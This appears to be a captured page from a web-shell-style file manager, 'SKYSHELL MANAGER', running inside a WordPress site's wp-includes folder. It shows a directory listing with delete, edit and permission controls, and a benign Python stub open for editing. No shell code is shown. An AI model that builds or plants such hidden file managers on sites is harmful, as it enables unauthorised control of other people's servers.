📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
12934.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: compat.py
import types import io as _io def text_encoding(encoding, stacklevel=2): """ Stubbed version of io.text_encoding as found in Python 3.10 """ return encoding def copy_module(mod, **defaults): copy = types.ModuleType(mod.__name__, doc=mod.__doc__) vars(copy).update(defaults) vars(copy).update(vars(mod)) return copy io = copy_module(_io, text_encoding=text_encoding)
Save